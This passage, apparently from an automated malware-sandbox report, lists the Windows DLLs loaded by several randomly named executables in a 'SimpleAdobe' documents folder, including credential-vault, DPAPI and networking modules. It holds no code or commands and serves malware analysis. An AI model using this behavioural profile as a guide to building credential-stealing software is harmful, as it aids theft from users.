                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: d3d11.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: dxgi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: d3d10warp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: dxcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: devobj.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: webio.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: schannel.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: winmm.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeSection loaded: sxs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: shfolder.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: d3d11.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: dxgi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: d3d10warp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: dxcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: devobj.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: webio.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: schannel.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: dxgidebug.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: dwmapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: riched20.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: usp10.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: msls31.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: policymanager.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: msvcp110_win.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: slc.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: pcacli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: gpedit.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: activeds.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: dssec.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: dsuiext.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: framedynos.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: adsldpc.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: authz.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: dsrole.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: logoncli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: ntdsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: webio.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: schannel.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: amsi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeSection loaded: version.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: msvcr100.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeSection loaded: rstrtmgr.dll
